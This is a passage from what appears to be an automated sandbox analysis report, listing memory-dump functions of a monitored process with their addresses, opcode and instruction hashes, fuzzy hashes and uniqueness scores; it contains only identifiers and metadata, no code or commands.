                                                                • Opcode Fuzzy Hash: d6b8eb84c09c3b37d4d7ba48e716f4e1884e0cabb9c9e0abfd66850dc58ce471
                                                                • Instruction Fuzzy Hash: F11149B19003099FDB10CF9AC8447DEBBF4EF49314F148429E529B7640E738A944CBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0715DF50, Relevance: .1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.907592052.0000000007150000.00000040.00000001.sdmp, Offset: 07150000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c64cdfc195fd9dd5b922253001dd7891b886020d86967325e3e42af725cd2948
                                                                • Instruction ID: 73dddb008c5df980024a4299c998e73f51bc23cd7da24cc2f1b175857bea15ef
                                                                • Opcode Fuzzy Hash: c64cdfc195fd9dd5b922253001dd7891b886020d86967325e3e42af725cd2948
                                                                • Instruction Fuzzy Hash: B101F7B13043129FE7266B68B850AA677D99B81654B0504B7EC5CCB795CF15EC018BB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFA08C, Relevance: .1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9d02e12c7b3e2060b4cc495e844d5ba43fa78d3122165e62ef83cfaf8a4b00d6
                                                                • Instruction ID: 3cc5354d3b851ba2dd7a363dc182232339ad61c537ff576a18f6c780069ce294
                                                                • Opcode Fuzzy Hash: 9d02e12c7b3e2060b4cc495e844d5ba43fa78d3122165e62ef83cfaf8a4b00d6
                                                                • Instruction Fuzzy Hash: BD21E779A00218DFDB14DFA4D884A9DB7B3FF8A315F104569EA06673A4CB36AC41CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0870E548, Relevance: .1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 37a873b9b6dab6345f7639c27c4c939fa87e87b7f2679e2c5785ccd7fabc09c3
                                                                • Instruction ID: 0cd93b52466e768b6190da4124f612e92802651ff275689af4eebfd1be9701d2
                                                                • Opcode Fuzzy Hash: 37a873b9b6dab6345f7639c27c4c939fa87e87b7f2679e2c5785ccd7fabc09c3
                                                                • Instruction Fuzzy Hash: 5501F9733043408FD310DB1D948055DBFD2DBD22297548C6EE1C98736ADA21E819D7B4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FF2980, Relevance: .0, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 40854d276fc3f526af321a9d3f2bc68873bdee95811a4c87b949dd15f1a7ad99
                                                                • Instruction ID: 929ab9fe985241e959ca2009d9ecb027437dc4dc3f6196a065c5afc41ace2de1
                                                                • Opcode Fuzzy Hash: 40854d276fc3f526af321a9d3f2bc68873bdee95811a4c87b949dd15f1a7ad99
                                                                • Instruction Fuzzy Hash: 7301B170300B158BD320EF68D88494EB7A6FFC522CB15892CD6068B311EFB5ED0587E5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFBF8F, Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e01f6a32b48e5822d371257432d4ddbfef05f9b6d7e20fe36c89fd15b2f424e1
                                                                • Instruction ID: 3b877cd7f9de271d56a99d41dbcbcde3a46af635e559e940658be39547ba75cb
                                                                • Opcode Fuzzy Hash: e01f6a32b48e5822d371257432d4ddbfef05f9b6d7e20fe36c89fd15b2f424e1
                                                                • Instruction Fuzzy Hash: 0501B9F5D0425A9F8B15CFA9D8044FAFFB4FE4A110B084196D55497281D7309580CFB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 04C1D005, Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.904609777.0000000004C1D000.00000040.00000001.sdmp, Offset: 04C1D000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 19cfcc583d2b4d20258e13bb0c2e037dcd371b8e3e9e41ddb79f592e75429329
                                                                • Instruction ID: c388197d2edc5c58dc929f5ad5b99e4c4065dc75c9e9828377ca93fddd1cbdea
                                                                • Opcode Fuzzy Hash: 19cfcc583d2b4d20258e13bb0c2e037dcd371b8e3e9e41ddb79f592e75429329
                                                                • Instruction Fuzzy Hash: 6701926140D3C05FE7128B249C94752BFB4EF43224F0980CBE9858F1A3D2696849C772
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 04C1D01D, Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.904609777.0000000004C1D000.00000040.00000001.sdmp, Offset: 04C1D000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b2f707b2f2c095dba6d528fc418ddb982282773929d76ee4aa7207d40f780275
                                                                • Instruction ID: 570f768eea106261f811a2e20ca2e36c241419de12b44f8d37936b63fdfc976a
                                                                • Opcode Fuzzy Hash: b2f707b2f2c095dba6d528fc418ddb982282773929d76ee4aa7207d40f780275
                                                                • Instruction Fuzzy Hash: FC01D471504340AEE7208A15E8C47A2BF98EF42364F18801AED464B252E779F945D6B1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFB0E8, Relevance: .0, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3284ffb77d7113bdb237d1e418b10c2f1286aa0fd071fe6d7baa9c4d9f293f3f
                                                                • Instruction ID: 09d2084098cb0d111563b92d866e8c3374b698d364e14a3188c2555f983b4431
                                                                • Opcode Fuzzy Hash: 3284ffb77d7113bdb237d1e418b10c2f1286aa0fd071fe6d7baa9c4d9f293f3f
                                                                • Instruction Fuzzy Hash: 6A0180B5A006148FCB14CF68C844A9EB7F6AF8D610F244169D101A7370CF719D04CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0715CF28, Relevance: .0, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.907592052.0000000007150000.00000040.00000001.sdmp, Offset: 07150000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2dd1d1287529202b34d03e496f75c6e401f963d89bb127a1ec551166ad97f245
                                                                • Instruction ID: 6df6f9b76a827b0e968b54ac28efca4d17011db216ecdcdaaeb4c39e25596a26
                                                                • Opcode Fuzzy Hash: 2dd1d1287529202b34d03e496f75c6e401f963d89bb127a1ec551166ad97f245
                                                                • Instruction Fuzzy Hash: 98F0A4B0A00209EFCB04EFB4D5095DDBBF29F84204F1084AAC815D7385EB345A419B91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07157341, Relevance: .0, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.907592052.0000000007150000.00000040.00000001.sdmp, Offset: 07150000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 622e14e5d6c66322907bcf71e8cf18dddf4708cf8e9be089ee24432052dfc75a
                                                                • Instruction ID: 75bf0382bccfdc3d99161d32ac67d5692818cdeefe785db899da50c4ae11389c
                                                                • Opcode Fuzzy Hash: 622e14e5d6c66322907bcf71e8cf18dddf4708cf8e9be089ee24432052dfc75a
                                                                • Instruction Fuzzy Hash: 40F0F0A220C3C06FC317026958145A6BFFA8B8717170901ABED84C7292D61D8905C3B1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFBFA0, Relevance: .0, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 018db4a6a893a42cb3eccc193254cb988f2a87a8187f0ea94ce93c0307114cf4
                                                                • Instruction ID: b283a7e24dacca076f2b0fdcf6501b13119c0baf9ab22cef15ffb600d822064b
                                                                • Opcode Fuzzy Hash: 018db4a6a893a42cb3eccc193254cb988f2a87a8187f0ea94ce93c0307114cf4
                                                                • Instruction Fuzzy Hash: 780186F5D0421A9F8B54DFAAD8448AAFFF9FF89210B088196D514A2241D7349980CFB0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08707CE0, Relevance: .0, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5fdaeff544ec422c70b2898942c8ce5553ed028c3dc78755c22a3fef92227f58
                                                                • Instruction ID: 3b97169690e4b56558c92085abc820ed300c1510cefe6031a8e67f051f90e988
                                                                • Opcode Fuzzy Hash: 5fdaeff544ec422c70b2898942c8ce5553ed028c3dc78755c22a3fef92227f58
                                                                • Instruction Fuzzy Hash: 85F0F673D09288EFCB168B79E8559D9FFB5EF56320F1984ABE000A7242D6311815CBB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFF7E0, Relevance: .0, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 414cd45486bf43c2d7ef9ba0273c48a0dab26ded98f0a067e636dead0a355776
                                                                • Instruction ID: 60dc7ec5e52050c042918963042451cdae366072219cf37bf5d4ad5dfe29b693
                                                                • Opcode Fuzzy Hash: 414cd45486bf43c2d7ef9ba0273c48a0dab26ded98f0a067e636dead0a355776
                                                                • Instruction Fuzzy Hash: 34F062316007058FC730DF2AD884C8BB7E6EFD52183108E3EE01A87675DB71E90A8B90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFDA90, Relevance: .0, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 95c27a07fdd961178cb4270867222ac999b8e07a8389540bba0cb94d87bfc746
                                                                • Instruction ID: dd33e053d69802b382e9805a362c71d1db89260f1d193e510fa6eea356b9c334
                                                                • Opcode Fuzzy Hash: 95c27a07fdd961178cb4270867222ac999b8e07a8389540bba0cb94d87bfc746
                                                                • Instruction Fuzzy Hash: C4F02076300A101B9919A2ACA0205BE728FCFC217930C883ED10A8BB61EF28DC0B53E5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FF8801, Relevance: .0, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6556692e96a350afc0c1c14151cc0d52167308a05b3daa7a120756523c86e0c7
                                                                • Instruction ID: 61c7db4bed4215e59c45f52d71dabd6c6d379f8805778c3bd26c9125da34aad1
                                                                • Opcode Fuzzy Hash: 6556692e96a350afc0c1c14151cc0d52167308a05b3daa7a120756523c86e0c7
                                                                • Instruction Fuzzy Hash: 08F02771A092849FD7019A7D9C022DFBFF8DF87260F0940A7D148C72A1DA30490AC7F2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFADB8, Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ef1cf1b7dad175cfb3892c55979b3f61bf36fd90d989c80996f35b117041f31a
                                                                • Instruction ID: acb9bcb99cfd09cc868545fc6e7b5a765f7d2bbf391822a68f5a738ab0bf88e5
                                                                • Opcode Fuzzy Hash: ef1cf1b7dad175cfb3892c55979b3f61bf36fd90d989c80996f35b117041f31a
                                                                • Instruction Fuzzy Hash: 8FF082E26092D1DBDB56A3755810369369A8F87060F0DC0F7C28E8B7A1DC189C6983B7
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFF7E8, Relevance: .0, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 15f3b7105c84922a8a4f78070f8f262e39358bf9e908023a58bded5c2fbafd42
                                                                • Instruction ID: 13dc145315bed4eb2688383d712f444f49b45741a1022ddb6c61cd3590fc5857
                                                                • Opcode Fuzzy Hash: 15f3b7105c84922a8a4f78070f8f262e39358bf9e908023a58bded5c2fbafd42
                                                                • Instruction Fuzzy Hash: A3F01D312007059FCB34DF2AD884C8BB7E5EF952183108D3EE45A87625DB71F9498BA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFB291, Relevance: .0, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5df5f26f76cf68ab4900f650c4c765d13505626bab51145f8785b21504d4a74d
                                                                • Instruction ID: c8beaa45d9cf7da59c040db7f2f715480da55801c9e1168b95037d8b36f668e6
                                                                • Opcode Fuzzy Hash: 5df5f26f76cf68ab4900f650c4c765d13505626bab51145f8785b21504d4a74d
                                                                • Instruction Fuzzy Hash: 93E0D872249BE94FCB1352B47C143E97BD8CF03175F0900E7E14CCB892C9494888C3A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFE130, Relevance: .0, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0f5c2cf0a12a5c034d560c8b1fc900d75b4ea394bc5f724d9e9e4f83c7a64eb3
                                                                • Instruction ID: e461933d6bfd0f7de4ae17bae05bbd08c7156db579ea9e0d186d82ea26e4f40f
                                                                • Opcode Fuzzy Hash: 0f5c2cf0a12a5c034d560c8b1fc900d75b4ea394bc5f724d9e9e4f83c7a64eb3
                                                                • Instruction Fuzzy Hash: 51F02B30509248AFE300DBB0E51539E3FBA9F83209F1044F9C4054B362DE316E119BA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0715FDF0, Relevance: .0, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.907592052.0000000007150000.00000040.00000001.sdmp, Offset: 07150000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ca230a8d89b348c7252d3e91587c3329ba224ace4b8181117140da6768a50e9c
                                                                • Instruction ID: 591902d028d3ba1fd78fe576fc69ded424efdc98ce61febf3ca63a70840386c5
                                                                • Opcode Fuzzy Hash: ca230a8d89b348c7252d3e91587c3329ba224ace4b8181117140da6768a50e9c
                                                                • Instruction Fuzzy Hash: 92F027713051204BE340A768F810AEB77A6CFC6214F19C1ABD505CB3E6DE35DC028791
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0715D8F0, Relevance: .0, Instructions: 32COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.907592052.0000000007150000.00000040.00000001.sdmp, Offset: 07150000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7f3fe62f886b14ccc5912821f2ab5956ec867cd995c5c62324ca4789889cf61e
                                                                • Instruction ID: 2499e3a006038e37146fc02e3d40a627d68ecf1085551334c4e9a49ce3e9c88b
                                                                • Opcode Fuzzy Hash: 7f3fe62f886b14ccc5912821f2ab5956ec867cd995c5c62324ca4789889cf61e
                                                                • Instruction Fuzzy Hash: B5F02ED1B08281DFD715AB6468911A9B761DF03100F4944DACCE18F2D1D728D502D3B2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFE790, Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f82c5418f3fc93854d6dab73e9760d4a642f099f0a42e4df3555e8ea6b932565
                                                                • Instruction ID: cd5b18cd773419437ca735f2f4be7cb38109bbce6bc2732ec48a119e95b6a4ab
                                                                • Opcode Fuzzy Hash: f82c5418f3fc93854d6dab73e9760d4a642f099f0a42e4df3555e8ea6b932565
                                                                • Instruction Fuzzy Hash: 94E02B757083A43BD30223B8B41516E3FEBDBC7166F84007AD505C7752DD195C1257E2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FF5768, Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 20187ab7063a680c4b85e807684f5c8ec3dfce6afaebcf75c170707c8cebcf24
                                                                • Instruction ID: 51cc5f657621d6493471d6dcb3c03d1df36ee512fad417b84ec9ae40c0580b29
                                                                • Opcode Fuzzy Hash: 20187ab7063a680c4b85e807684f5c8ec3dfce6afaebcf75c170707c8cebcf24
                                                                • Instruction Fuzzy Hash: F6F03AB56006109FC314DF29C44484A7BE5EF8A628715C9AEE11ACF731DF72EC058BD0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FF52C8, Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fba5e84f14e27cf564d54bbea2cd071d38f0364d0ad5f6b81afac356cf41944f
                                                                • Instruction ID: 9c4cb14d0d809bd5bc5feab99cbb01cfc1f69815a56db2f18ac2afbeb95d08dd
                                                                • Opcode Fuzzy Hash: fba5e84f14e27cf564d54bbea2cd071d38f0364d0ad5f6b81afac356cf41944f
                                                                • Instruction Fuzzy Hash: 9EF0E5B25043040BC731AB38D8094DD3BA9FE92619B154D6BD061C75B1DFA0E90487F1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FF65A8, Relevance: .0, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b0fbccb8ade90f2251aff27c0627839b6f0fd37160fac9cf349e780a88a030b3
                                                                • Instruction ID: 66d566de313da00fa20738d369c1b711415b8d4c0d27df3284b999bb05c8e98a
                                                                • Opcode Fuzzy Hash: b0fbccb8ade90f2251aff27c0627839b6f0fd37160fac9cf349e780a88a030b3
                                                                • Instruction Fuzzy Hash: D5F0A7B110A3959FDB22463895142B47FE4AF03215B0C44DAD4C1CA592CFA9D804C7B1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08707538, Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1a7a8728909e17d6c792bd11a1a8c207dcd7065c2431417d68220ab0a4ac96f3
                                                                • Instruction ID: b38849a3292f31daef94c4705d8a669a4b23b1ac1c2eea6ac4deabf2503b44f4
                                                                • Opcode Fuzzy Hash: 1a7a8728909e17d6c792bd11a1a8c207dcd7065c2431417d68220ab0a4ac96f3
                                                                • Instruction Fuzzy Hash: 09F0157A7002149FC314CA59E888D6BBBE9EB8C720B10812AE60A87351CA71AC018BA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0715CEAF, Relevance: .0, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.907592052.0000000007150000.00000040.00000001.sdmp, Offset: 07150000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a08b19adf0b0e17b3d1a2c87188cfe8d445bcdb069dc5ce8a799d689ee287644
                                                                • Instruction ID: f5578b952e752f3f6cb2c2087a2753fffa8f38f1748961a59a7ea9b74b1b0720
                                                                • Opcode Fuzzy Hash: a08b19adf0b0e17b3d1a2c87188cfe8d445bcdb069dc5ce8a799d689ee287644
                                                                • Instruction Fuzzy Hash: FDE0EC71A09344AFD700DB60E5127EC7FF6CB82318F1044E9C444D76A1DA312E005762
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFADC8, Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c4715182d161e7781e938647c489f7aa3278e11e95c22eb2f625a51acee503ab
                                                                • Instruction ID: 38b420dbb5d0f55830d068ae2ac59d95176e271ec3eddc0d848e5fccfc481072
                                                                • Opcode Fuzzy Hash: c4715182d161e7781e938647c489f7aa3278e11e95c22eb2f625a51acee503ab
                                                                • Instruction Fuzzy Hash: BDE04FE27551A5C7DB05B376991036E318A8F8B120F0CC1B6834F87760DC29EC6943E7
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08706970, Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e840fab285514e9daf32524d4accc1daa5ed1be15923dda476cdf78401b3db7b
                                                                • Instruction ID: 7db880640e718356d8eeff7e7f7320f4a2ad9d7143d3f493fd9c472ab4afbf87
                                                                • Opcode Fuzzy Hash: e840fab285514e9daf32524d4accc1daa5ed1be15923dda476cdf78401b3db7b
                                                                • Instruction Fuzzy Hash: B4E065312006049FE314E669D454A5E77DBDBC5239F04497DD5098B661CE74E84587A4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFE140, Relevance: .0, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 39a0fd8db809c817e8366817b7357bb348155413426798e695cbc45d6371aa10
                                                                • Instruction ID: ee76a9e014cbeacd8684969e4bccee718508346509090f872c789d7af14fa67a
                                                                • Opcode Fuzzy Hash: 39a0fd8db809c817e8366817b7357bb348155413426798e695cbc45d6371aa10
                                                                • Instruction Fuzzy Hash: F7F0A730605108AFE700EBF4D51579E3BABDB8230DF1044BCC4095B361DF356D115BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FF5F8F, Relevance: .0, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d1e3986f47cf4c13082d24e2f9f1742e2bd69b45729034ea7471c11e92efec77
                                                                • Instruction ID: 0951ee553e0f42a79a0fba5a483149c606009e5b6d8bf67198f666ac8a866a1d
                                                                • Opcode Fuzzy Hash: d1e3986f47cf4c13082d24e2f9f1742e2bd69b45729034ea7471c11e92efec77
                                                                • Instruction Fuzzy Hash: 10E04F352082949FD3069BB8E4999947F76EF0E26471500D6E945CB333CA29D80797A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFE7A0, Relevance: .0, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 576581e80bc64657b06443e7c8e475f2ceed0d0a5a4e0cd417471d0e02155337
                                                                • Instruction ID: b60e1dc33e35c1595f3a753f27e9748e8640833c1593d92ec4a604d6f7bfec6c
                                                                • Opcode Fuzzy Hash: 576581e80bc64657b06443e7c8e475f2ceed0d0a5a4e0cd417471d0e02155337
                                                                • Instruction Fuzzy Hash: BAE0CD75B0022467E60036FD741816F36DBD7C6166F900039E906C3340DD295C1257E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07FFD166, Relevance: .0, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.909794754.0000000007FF0000.00000040.00000001.sdmp, Offset: 07FF0000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dee00d0d1e6a5169b51c8e4e62613adcd846d703a9271df89351d849c7e065c3
                                                                • Instruction ID: efddb8d65e2b80de248ba168798f10f77cb8fedd4c2eb65016bc1c56863615c8
                                                                • Opcode Fuzzy Hash: dee00d0d1e6a5169b51c8e4e62613adcd846d703a9271df89351d849c7e065c3
                                                                • Instruction Fuzzy Hash: 87F030347401149BEB04DBA4E825BED7B72FF85315F1040A5E6056B2E5CB356901CB10
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0715CC20, Relevance: .0, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.907592052.0000000007150000.00000040.00000001.sdmp, Offset: 07150000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c4556c3e3d414ce248e4cacadb99763896d74cc68d5384f3172d62d9ccb4b2a0
                                                                • Instruction ID: 11494666c7f8a769069bd55bae003fcbd0ec80b830bec78e85eb7ed2e91af069
                                                                • Opcode Fuzzy Hash: c4556c3e3d414ce248e4cacadb99763896d74cc68d5384f3172d62d9ccb4b2a0
                                                                • Instruction Fuzzy Hash: 5BE0DF753141C05FC702F228F415AE93BA29BCA22432A84AAE004CF2F7DF64DC0283E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08708468, Relevance: .0, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.910697637.0000000008700000.00000040.00000001.sdmp, Offset: 08700000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 860a3f4ac1e5afc71cb496f0109738ae77e221b5986635898d648b2158aef9fe
